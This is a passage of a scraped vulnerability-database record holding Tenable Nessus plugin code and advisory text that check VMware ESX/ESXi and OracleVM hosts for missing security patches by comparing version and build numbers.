\"CVE-2010-0427\"\n );\n script_bugtraq_id(\n 31692,\n 34256,\n 35001,\n 35112,\n 35138,\n 35174,\n 35417,\n 36304,\n 36472,\n 36576,\n 36639,\n 36706,\n 36723,\n 36824,\n 36827,\n 36901,\n 36936,\n 37019,\n 37068,\n 37069,\n 37118,\n 37128,\n 37255,\n 37339,\n 37519,\n 37521,\n 37523,\n 37749,\n 37806,\n 37865,\n 37876,\n 37886,\n 38432\n );\n script_xref(name:\"VMSA\", value:\"2010-0009\");\n\n script_name(english:\"VMware ESX / ESXi Third-Party Libraries and Components (VMSA-2010-0009) (remote check)\");\n script_summary(english:\"Checks the ESX / ESXi version and build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESX / ESXi host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESX / ESXi host is missing a security-related patch.\nIt is, therefore, affected by multiple vulnerabilities, including\nremote code execution vulnerabilities, in several components and\nthird-party libraries :\n\n - libpng\n - VMnc Codec\n - vmrun\n - VMware Remote Console (VMrc)\n - VMware Tools\n - vmware-authd\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2010-0009\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.vmware.com/pipermail/security-announce/2010/000099.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the vendor advisory that\npertains to ESX version 3.5 / 4.0 or ESXi version 3.5 / 4.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119, 189, 200, 264, 287, 310, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/08\");\n \n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Host/VMware/vsphere\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit(\"Host/VMware/version\");\nrel = get_kb_item_or_exit(\"Host/VMware/release\");\nport = get_kb_item_or_exit(\"Host/VMware/vsphere\");\nesx = '';\n\nif (\"ESX\" >!< rel)\n audit(AUDIT_OS_NOT, \"VMware ESX/ESXi\");\n\nextract = eregmatch(pattern:\"^(ESXi?) (\\d\\.\\d).*$\", string:ver);\nif (isnull(extract))\n audit(AUDIT_UNKNOWN_APP_VER, \"VMware ESX/ESXi\");\nelse\n{\n esx = extract[1];\n ver = extract[2];\n}\n\n# fixed build numbers are the same for ESX and ESXi\nfixes = make_array(\n \"4.0\", \"256968\",\n \"3.5\", \"259926\"\n );\n\nfix = FALSE;\nfix = fixes[ver];\n\n# get the build before checking the fix for the most complete audit trail\nextract = eregmatch(pattern:'^VMware ESXi?.* build-([0-9]+)$', string:rel);\nif (isnull(extract))\n audit(AUDIT_UNKNOWN_BUILD, \"VMware \" + esx, ver);\n\nbuild = int(extract[1]);\n\n# if there is no fix in the array, fix is FALSE\nif (!fix)\n audit(AUDIT_INST_VER_NOT_VULN, \"VMware \" + esx, ver, build);\n\nif (build < fix)\n{\n\n report = '\\n Version : ' + esx + \" \" + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n exit(0);\n}\nelse\n audit(AUDIT_INST_VER_NOT_VULN, \"VMware \" + esx, ver, build);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:13:24", "bulletinFamily": "scanner", "description": "a. Service Console update for COS kernel\n\n Updated COS package 'kernel' addresses the security issues that are fixed through versions 2.6.18-164.11.1.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228, CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues fixed in kernel 2.6.18-164.6.1\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621, CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537, CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080, CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020, CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to the security issues fixed in kernel 2.6.18-164.11.1.\n\nb. ESXi userworld update for ntp\n\n The Network Time Protocol (NTP) is used to synchronize the time of a computer client or server to another server or reference time source.\n\n A vulnerability in ntpd could allow a remote attacker to cause a denial of service (CPU and bandwidth consumption) by using MODE_PRIVATE to send a spoofed (1) request or (2) response packet that triggers a continuous exchange of MODE_PRIVATE error responses between two NTP daemons.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-3563 to this issue.\n\nc. Service Console package openssl updated to 0.9.8e-12.el5_4.1\n\n OpenSSL is a toolkit implementing SSL v2/v3 and TLS protocols with full-strength cryptography world-wide.\n\n A memory leak in the zlib could allow a remote attacker to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-4355 to this issue.\n\n A vulnerability was discovered which may allow remote attackers to spoof certificates by using MD2 design flaws to generate a hash collision in less than brute-force time. NOTE: the scope of this issue is currently limited because the amount of computation required is still large.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-2409 to this issue.\n\n This update also includes security fixes that were first addressed in version openssl-0.9.8e-12.el5.i386.rpm.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the names CVE-2009-0590, CVE-2009-1377, CVE-2009-1378, CVE-2009-1379, CVE-2009-1386 and CVE-2009-1387 to these issues.\n\nd. Service Console update for krb5 to 1.6.1-36.el5_4.1 and pam_krb5 to 2.2.14-15.\n\n Kerberos is a network authentication protocol. It is designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\n Multiple integer underflows in the AES and RC4 functionality in the crypto library could allow remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code by providing ciphertext with a length that is too short to be valid.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-4212 to this issue.\n\n The service console package for pam_krb5 is updated to version pam_krb5-2.2.14-15. This update fixes a flaw found in pam_krb5. In some non-default configurations (specifically, where pam_krb5 would be the first module to prompt for a password), a remote attacker could use this flaw to recognize valid usernames, which would aid a dictionary-based password guess attack.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-1384 to this issue.\n\ne. Service Console package bind updated to 9.3.6-4.P1.el5_4.2\n\n BIND (Berkeley Internet Name Daemon) is by far the most widely used Domain Name System (DNS) software on the Internet.\n\n A vulnerability was discovered which could allow remote attacker to add the Authenticated Data (AD) flag to a forged NXDOMAIN response for an existing domain.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2010-0097 to this issue.\n\n A vulnerability was discovered which could allow remote attackers to conduct DNS cache poisoning attacks by receiving a recursive client query and sending a response that contains CNAME or DNAME records, which do not have the intended validation before caching.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2010-0290 to this issue.\n\n A vulnerability was found in the way that bind handles out-of- bailiwick data accompanying a secure response without re-fetching from the original source, which could allow remote attackers to have an unspecified impact via a crafted response.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2010-0382 to this issue.\n\n NOTE: ESX does not use the BIND name service daemon by default.\n\nf. Service Console package gcc updated to 3.2.3-60\n\n The GNU Compiler Collection includes front ends for C, C++, Objective-C, Fortran, Java, and Ada, as well as libraries for these languages\n\n GNU Libtool's ltdl.c attempts to open .la library files in the current working directory. This could allow a local user to gain privileges via a Trojan horse file. The GNU C Compiler collection (gcc) provided in ESX contains a statically linked version of the vulnerable code, and is being replaced.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-3736 to this issue.\n\ng. Service Console package gzip update to 1.3.3-15.rhel3\n\n gzip is a software application used for file compression\n\n An integer underflow in gzip's unlzw function on 64-bit platforms may allow a remote attacker to trigger an array index error leading to a denial of service (application crash) or possibly execute arbitrary code via a crafted LZW compressed file.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2010-0001 to this issue.\n\nh. Service Console package sudo updated to 1.6.9p17-6.el5_4\n\n Sudo (su 'do') allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\n\n When a pseudo-command is enabled, sudo permits a match between the name of the pseudo-command and the name of an executable file in an arbitrary directory, which allows local users to gain privileges via a crafted executable file.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2010-0426 to this issue.\n\n When the runas_default option is used, sudo does not properly set group memberships, which allows local users to gain privileges via a sudo command.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2010-0427 to this issue.", "modified": "2018-08-06T00:00:00", "id": "VMWARE_VMSA-2010-0009.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=46765", "published": "2010-06-01T00:00:00", "title": "VMSA-2010-0009 : ESXi ntp and ESX Service Console third-party updates", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2010-0009. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(46765);\n script_version(\"1.43\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\"CVE-2006-6304\", \"CVE-2007-4567\", \"CVE-2009-0590\", \"CVE-2009-1377\", \"CVE-2009-1378\", \"CVE-2009-1379\", \"CVE-2009-1384\", \"CVE-2009-1386\", \"CVE-2009-1387\", \"CVE-2009-2409\", \"CVE-2009-2695\", \"CVE-2009-2908\", \"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3228\", \"CVE-2009-3286\", \"CVE-2009-3547\", \"CVE-2009-3556\", \"CVE-2009-3563\", \"CVE-2009-3612\", \"CVE-2009-3613\", \"CVE-2009-3620\", \"CVE-2009-3621\", \"CVE-2009-3726\", \"CVE-2009-3736\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4212\", \"CVE-2009-4272\", \"CVE-2009-4355\", \"CVE-2009-4536\", \"CVE-2009-4537\", \"CVE-2009-4538\", \"CVE-2010-0001\", \"CVE-2010-0097\", \"CVE-2010-0290\", \"CVE-2010-0382\", \"CVE-2010-0426\", \"CVE-2010-0427\");\n script_bugtraq_id(31692, 34256, 35001, 35112, 35138, 35174, 35417, 36304, 36472, 36576, 36639, 36706, 36723, 36824, 36827, 36901, 36936, 37019, 37068, 37069, 37118, 37128, 37255, 37339, 37519, 37521, 37523, 37749, 37806, 37865, 37876, 37886, 38432);\n script_xref(name:\"VMSA\", value:\"2010-0009\");\n\n script_name(english:\"VMSA-2010-0009 : ESXi ntp and ESX Service Console third-party updates\");\n script_summary(english:\"Checks esxupdate output for the patches\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote VMware ESXi / ESX host is missing one or more\nsecurity-related patches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"a. Service Console update for COS kernel\n\n Updated COS package 'kernel' addresses the security issues that are\n fixed through versions 2.6.18-164.11.1.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228,\n CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues\n fixed in kernel 2.6.18-164.6.1\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621,\n CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537,\n CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080,\n CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,\n CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to\n the security issues fixed in kernel 2.6.18-164.11.1.\n\nb. ESXi userworld update for ntp\n\n The Network Time Protocol (NTP) is used to synchronize the time of\n a computer client or server to another server or reference time\n source.\n\n A vulnerability in ntpd could allow a remote attacker to cause a\n denial of service (CPU and bandwidth consumption) by using\n MODE_PRIVATE to send a spoofed (1) request or (2) response packet\n that triggers a continuous exchange of MODE_PRIVATE error responses\n between two NTP daemons.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-3563 to this issue.\n\nc. Service Console package openssl updated to 0.9.8e-12.el5_4.1\n\n OpenSSL is a toolkit implementing SSL v2/v3 and TLS protocols with\n full-strength cryptography world-wide.\n\n A memory leak in the zlib could allow a remote attacker to cause a\n denial of service (memory consumption) via vectors that trigger\n incorrect calls to the CRYPTO_cleanup_all_ex_data function.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-4355 to this issue.\n\n A vulnerability was discovered which may allow remote attackers to\n spoof certificates by using MD2 design flaws to generate a hash\n collision in less than brute-force time. NOTE: the scope of this\n issue is currently limited because the amount of computation\n required is still large.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-2409 to this issue.\n\n This update also includes security fixes that were first addressed\n in version openssl-0.9.8e-12.el5.i386.rpm.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the names CVE-2009-0590, CVE-2009-1377, CVE-2009-1378,\n CVE-2009-1379, CVE-2009-1386 and CVE-2009-1387 to these issues.\n\nd. Service Console update for krb5 to 1.6.1-36.el5_4.1 and pam_krb5 to\n 2.2.14-15.\n\n Kerberos is a network authentication protocol. It is designed to\n provide strong authentication for client/server applications by\n using secret-key cryptography.\n\n Multiple integer underflows in the AES and RC4 functionality in the\n crypto library could allow remote attackers to cause a denial of\n service (daemon crash) or possibly execute arbitrary code by\n providing ciphertext with a length that is too short to be valid.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-4212 to this issue.\n\n The service console package for pam_krb5 is updated to version\n pam_krb5-2.2.14-15. This update fixes a flaw found in pam_krb5. In\n some non-default configurations (specifically, where pam_krb5 would\n be the first module to prompt for a password), a remote attacker\n could use this flaw to recognize valid usernames, which would aid a\n dictionary-based password guess attack.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-1384 to this issue.\n\ne. Service Console package bind updated to 9.3.6-4.P1.el5_4.2\n\n BIND (Berkeley Internet Name Daemon) is by far the most widely used\n Domain Name System (DNS) software on the Internet.\n\n A vulnerability was discovered which could allow remote attacker to\n add the Authenticated Data (AD) flag to a forged NXDOMAIN response\n for an existing domain.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2010-0097 to this issue.\n\n A vulnerability was discovered which could allow remote attackers\n to conduct DNS cache poisoning attacks by receiving a recursive\n client query and sending a response that contains CNAME or DNAME\n records, which do not have the intended validation before caching.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2010-0290 to this issue.\n\n A vulnerability was found in the way that bind handles out-of-\n bailiwick data accompanying a secure response without re-fetching\n from the original source, which could allow remote attackers to\n have an unspecified impact via a crafted response.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2010-0382 to this issue.\n\n NOTE: ESX does not use the BIND name service daemon by default.\n\nf. Service Console package gcc updated to 3.2.3-60\n\n The GNU Compiler Collection includes front ends for C, C++,\n Objective-C, Fortran, Java, and Ada, as well as libraries for these\n languages\n\n GNU Libtool's ltdl.c attempts to open .la library files in the\n current working directory. This could allow a local user to gain\n privileges via a Trojan horse file. The GNU C Compiler collection\n (gcc) provided in ESX contains a statically linked version of the\n vulnerable code, and is being replaced.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-3736 to this issue.\n\ng. Service Console package gzip update to 1.3.3-15.rhel3\n\n gzip is a software application used for file compression\n\n An integer underflow in gzip's unlzw function on 64-bit platforms\n may allow a remote attacker to trigger an array index error\n leading to a denial of service (application crash) or possibly\n execute arbitrary code via a crafted LZW compressed file.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2010-0001 to this issue.\n\nh. Service Console package sudo updated to 1.6.9p17-6.el5_4\n\n Sudo (su 'do') allows a system administrator to delegate authority\n to give certain users (or groups of users) the ability to run some\n (or all) commands as root or another user while providing an audit\n trail of the commands and their arguments.\n\n When a pseudo-command is enabled, sudo permits a match between the\n name of the pseudo-command and the name of an executable file in an\n arbitrary directory, which allows local users to gain privileges\n via a crafted executable file.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2010-0426 to this issue.\n\n When the runas_default option is used, sudo does not properly set\n group memberships, which allows local users to gain privileges via\n a sudo command.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2010-0427 to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2010/000099.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119, 189, 200, 264, 287, 310, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2010-05-27\");\nflag = 0;\n\n\nif (esx_check(ver:\"ESX 3.5.0\", patch:\"ESX350-201006405-SG\")) flag++;\nif (esx_check(ver:\"ESX 3.5.0\", patch:\"ESX350-201006406-SG\")) flag++;\nif (\n esx_check(\n ver : \"ESX 3.5.0\",\n patch : \"ESX350-201006408-SG\",\n patch_updates : make_list(\"ESX350-201008411-SG\")\n )\n) flag++;\n\nif (\n esx_check(\n ver : \"ESX 4.0.0\",\n patch : \"ESX400-201005401-SG\",\n patch_updates : make_list(\"ESX400-201009401-SG\", \"ESX400-201101401-SG\", \"ESX400-201103401-SG\", \"ESX400-201104401-SG\", \"ESX400-201110401-SG\", \"ESX400-201111201-SG\", \"ESX400-201203401-SG\", \"ESX400-201205401-SG\", \"ESX400-201206401-SG\", \"ESX400-201209401-SG\", \"ESX400-201302401-SG\", \"ESX400-201305401-SG\", \"ESX400-201310401-SG\", \"ESX400-201404401-SG\", \"ESX400-Update02\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.0.0\",\n patch : \"ESX400-201005405-SG\",\n patch_updates : make_list(\"ESX400-Update02\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.0.0\",\n patch : \"ESX400-201005406-SG\",\n patch_updates : make_list(\"ESX400-201009403-SG\", \"ESX400-201110403-SG\", \"ESX400-201203407-SG\", \"ESX400-Update02\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.0.0\",\n patch : \"ESX400-201005407-SG\",\n patch_updates : make_list(\"ESX400-Update02\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.0.0\",\n patch : \"ESX400-201005408-SG\",\n patch_updates : make_list(\"ESX400-201103407-SG\", \"ESX400-201305403-SG\", \"ESX400-Update02\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.0.0\",\n patch : \"ESX400-201005409-SG\",\n patch_updates : make_list(\"ESX400-201009410-SG\", \"ESX400-201101404-SG\", \"ESX400-201305402-SG\", \"ESX400-Update02\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\n\nif (\n esx_check(\n ver : \"ESXi 4.0.0\",\n patch : \"ESXi400-201005401-SG\",\n patch_updates : make_list(\"ESXi400-201101401-SG\", \"ESXi400-201103401-SG\", \"ESXi400-201104401-SG\", \"ESXi400-201110401-SG\", \"ESXi400-201203401-SG\", \"ESXi400-201205401-SG\", \"ESXi400-201206401-SG\", \"ESXi400-201209401-SG\", \"ESXi400-201302401-SG\", \"ESXi400-201305401-SG\", \"ESXi400-201310401-SG\", \"ESXi400-201404401-SG\", \"ESXi400-Update02\", \"ESXi400-Update03\", \"ESXi400-Update04\")\n )\n) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:22:52", "bulletinFamily": "scanner", "description": "The remote OracleVM system is missing necessary patches to address critical security updates : please see Oracle VM Security Advisory OVMSA-2013-0039 for details.", "modified": "2018-07-24T00:00:00", "id": "ORACLEVM_OVMSA-2013-0039.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79507", "published": "2014-11-26T00:00:00", "title": "OracleVM 2.2 : kernel (OVMSA-2013-0039)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2013-0039.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79507);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n\n script_cve_id(\"CVE-2006-6304\", \"CVE-2007-4567\", \"CVE-2009-0745\", \"CVE-2009-0746\", \"CVE-2009-0747\", \"CVE-2009-0748\", \"CVE-2009-1388\", \"CVE-2009-1389\", \"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-2692\", \"CVE-2009-2847\", \"CVE-2009-2848\", \"CVE-2009-2908\", \"CVE-2009-3080\", \"CVE-2009-3286\", \"CVE-2009-3547\", \"CVE-2009-3612\", \"CVE-2009-3620\", \"CVE-2009-3621\", \"CVE-2009-3726\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4067\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4307\", \"CVE-2009-4308\", \"CVE-2009-4536\", \"CVE-2009-4537\", \"CVE-2009-4538\", \"CVE-2010-0007\", \"CVE-2010-0415\", \"CVE-2010-0437\", \"CVE-2010-0622\", \"CVE-2010-0727\", \"CVE-2010-1083\", \"CVE-2010-1084\", \"CVE-2010-1086\", \"CVE-2010-1087\", \"CVE-2010-1088\", \"CVE-2010-1173\", \"CVE-2010-1188\", \"CVE-2010-1436\", \"CVE-2010-1437\", \"CVE-2010-1641\", \"CVE-2010-2226\", \"CVE-2010-2240\", \"CVE-2010-2248\", \"CVE-2010-2521\", \"CVE-2010-2798\", \"CVE-2010-2942\", \"CVE-2010-2963\", \"CVE-2010-3067\", \"CVE-2010-3078\", \"CVE-2010-3086\", \"CVE-2010-3296\", \"CVE-2010-3432\", \"CVE-2010-3442\", \"CVE-2010-3477\", \"CVE-2010-3858\", \"CVE-2010-3859\", \"CVE-2010-3876\", \"CVE-2010-3877\", \"CVE-2010-4073\", \"CVE-2010-4080\", \"CVE-2010-4081\", \"CVE-2010-4083\", \"CVE-2010-4157\", \"CVE-2010-4158\", \"CVE-2010-4242\", \"CVE-2010-4248\", \"CVE-2010-4249\", \"CVE-2010-4258\", \"CVE-2010-4346\", \"CVE-2010-4649\", \"CVE-2010-4655\", \"CVE-2011-0521\", \"CVE-2011-0726\", \"CVE-2011-1010\", \"CVE-2011-1020\", \"CVE-2011-1044\", \"CVE-2011-1078\", \"CVE-2011-1079\", \"CVE-2011-1080\", \"CVE-2011-1083\", \"CVE-2011-1090\", \"CVE-2011-1093\", \"CVE-2011-1160\", \"CVE-2011-1162\", \"CVE-2011-1163\", \"CVE-2011-1182\", \"CVE-2011-1573\", \"CVE-2011-1577\", \"CVE-2011-1585\", \"CVE-2011-1745\", \"CVE-2011-1746\", \"CVE-2011-1776\", \"CVE-2011-1833\", \"CVE-2011-2022\", \"CVE-2011-2203\", \"CVE-2011-2213\", \"CVE-2011-2482\", \"CVE-2011-2484\", \"CVE-2011-2491\", \"CVE-2011-2496\", \"CVE-2011-2525\", \"CVE-2011-3191\", \"CVE-2011-3637\", \"CVE-2011-3638\", \"CVE-2011-4077\", \"CVE-2011-4086\", \"CVE-2011-4110\", \"CVE-2011-4127\", \"CVE-2011-4324\", \"CVE-2011-4330\", \"CVE-2011-4348\", \"CVE-2012-1583\", \"CVE-2012-2136\");\n script_bugtraq_id(35281, 35647, 35850, 35851, 35930, 36038, 36472, 36639, 36723, 36824, 36827, 36901, 36936, 37068, 37069, 37339, 37519, 37521, 37523, 37762, 37806, 38144, 38165, 38185, 38479, 38898, 39016, 39042, 39044, 39101, 39569, 39715, 39719, 39794, 40356, 40920, 42124, 42242, 42249, 42505, 42529, 43022, 43221, 43353, 43480, 43787, 43809, 44242, 44301, 44354, 44630, 44648, 44754, 44758, 45014, 45028, 45037, 45058, 45063, 45073, 45159, 45323, 45972, 45986, 46073, 46488, 46492, 46567, 46616, 46630, 46766, 46793, 46866, 46878, 47003, 47308, 47321, 47343, 47381, 47534, 47535, 47791, 47796, 47843, 48236, 48333, 48383, 48641, 48687, 49108, 49141, 49295, 49373, 50322, 50370, 50750, 50755, 50764, 50798, 51176, 51361, 51363, 51945, 53139, 53721);\n\n script_name(english:\"OracleVM 2.2 : kernel (OVMSA-2013-0039)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote 